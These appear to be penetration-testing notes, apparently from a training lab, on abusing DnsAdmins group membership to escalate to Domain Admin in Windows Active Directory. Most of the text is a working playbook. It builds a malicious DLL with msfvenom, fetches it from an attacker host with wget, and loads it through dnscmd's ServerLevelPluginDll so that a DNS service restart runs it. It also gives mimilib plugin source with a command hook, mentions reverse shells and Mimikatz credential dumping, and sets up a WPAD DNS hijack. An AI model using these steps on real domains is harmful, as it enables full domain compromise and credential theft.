dnsadmins

Approach to Exploiting DnsAdmins

1. Generate a Malicious DLL

msfvenom -p windows/x64/exec cmd='<command>' -f dll -o <dll_name>.dll

2. Host DLL on an HTTP Server

python3 -m http.server <port>

3. Transfer DLL to Target Machine

wget "http://<attacker_ip>:<port>/<dll_name>.dll" -outfile "<dll_name>.dll"

4. Verify Membership in DnsAdmins Group

Get-ADGroupMember -Identity DnsAdmins

5. Load Custom DLL into DNS Server Configuration

dnscmd.exe /config /serverlevelplugindll <dll_path>

6. Check Permissions on DNS Service

Retrieve the Security Identifier (SID) of the user:

wmic useraccount where name="<user>" get sid

Check DNS service permissions:

sc.exe sdshow DNS

7. Restart DNS Service to Trigger Payload Execution

sc stop dns
sc start dns

8. Verify Exploitation

Check if the user was added to the Domain Admins group (if applicable):

net group "Domain Admins" /dom

9. Cleanup (if needed)

Check for the malicious DLL entry:

reg query \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Remove the DLL entry from the registry:

reg delete \\<target_ip>\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll

Restart DNS service after cleanup

sc.exe start dns
sc query dns

10. Alternative Exploit - WPAD Attack

Disable WPAD blocking:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName <dc_hostname>

Create a WPAD DNS record pointing to the attacker's IP:

Add-DnsServerResourceRecordA -Name wpad -ZoneName <domain_name> -ComputerName <dc_hostname> -IPv4Address <attacker_ip>

Commands Used:

• msfvenom

• python3 -m http.server

• wget

• dnscmd.exe

• wmic

• sc.exe

• net

• reg

• Set-DnsServerGlobalQueryBlockList

• Add-DnsServerResourceRecordA

PowerShell Cmdlets:

• `Get-ADGroupMember

Using Mimilib.dll

As detailed in this post, we could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.

Code:

/*  Benjamin DELPY `gentilkiwi`
    https://blog.gentilkiwi.com
    benjamin@gentilkiwi.com
    Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"
DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()

{

    return ERROR_SUCCESS;

}  

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)

{

    FILE * kdns_logfile;
#pragma warning(push)

#pragma warning(disable:4996)

    if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))

#pragma warning(pop)

    {

        klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);

        fclose(kdns_logfile);

        system("ENTER COMMAND HERE");

    }

    return ERROR_SUCCESS;

}

---

---

---

Following attacks can be performed:

• DNS management is performed over RPC

• ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL's path. This can be done with the dnscmd tool from the command line

• When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll registry key is populated

• When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller's machine account can access)

• An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

Leverage DNSAdmins Access:

Attack:1 - Reverse shell attack or admin access

Generate malicious DLL

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

Download file to target

python3 -m http.server 7777

wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

Load DLL

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

Finding user's SID

wmic useraccount where name="netadm" get sid

Check permissions on DNS service

sc.exe sdshow DNS

sc stop dns #(stop DNS service)

sc start dns #(start DNS service)

Check DNS service status

sc.exe query dns

Checking admin group membership

net group "Domain Admins" /dom

Checking registry key change

reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

Deleting registry key

reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll

Start the DNS service

sc.exe start dns

sc query dns             #DNS service status check 

ATTACK:2 - Command execution attack - mimilib.dll

Mimilib.dll

/*	Benjamin DELPY `gentilkiwi`
	https://blog.gentilkiwi.com
	benjamin@gentilkiwi.com
	Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
	return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
	FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
	if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
	{
		klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
		fclose(kdns_logfile);
		system("ENTER COMMAND HERE");
	}
	return ERROR_SUCCESS;
}

Disable global query block

dnsserverglobalqueryblocklist

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

Adding a WPAD Record

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3